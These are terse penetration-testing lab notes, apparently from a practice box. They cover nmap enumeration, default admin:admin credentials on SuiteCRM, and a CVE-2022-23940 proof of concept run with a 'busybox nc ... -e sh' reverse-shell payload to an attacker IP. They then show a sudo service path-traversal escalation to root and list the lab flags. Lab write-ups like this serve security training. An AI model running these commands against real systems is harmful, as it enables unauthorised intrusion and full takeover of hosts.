Enum
sudo nmap -T4 -A -v -o nmap --min-rate 1000 $IP
sudo nmap -T4 --script=vuln -v -o vuln --min-rate 1000 $IP
sudo nmap -T4 -A -v -p- -o alltcp --min-rate 1000 $IP
sudo nmap -T4 -sU -sV -sC -v -p -o udp --min-rate 1000 $IP
sudo nmap -A -v -p- -o alltcpslow $IP
Services:
Discovered open port 22/tcp on 192.168.156.146
Discovered open port 3306/tcp on 192.168.156.146
Discovered open port 80/tcp on 192.168.156.146
SuiteCRM
admin:admin
If creds don’t work, try them again
Googled version, found poc
python3 exploit.py -h http://192.168.156.146 --payload 'busybox nc 192.168.45.171 22 -e sh'
Username> : admin
Password> :
INFO:CVE-2022-23940:Login did work - Trying to create scheduled report
local
a85831cf76ed3058f142d31ba7357fb7
sudo -l
Matching Defaults entries for www-data on localhost:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on localhost:
(ALL) NOPASSWD: /usr/sbin/service
gbin
sudo /usr/sbin/service ../../../../bin/bash
thats root
proof
4cea78830ce246f0c7757708228c42e7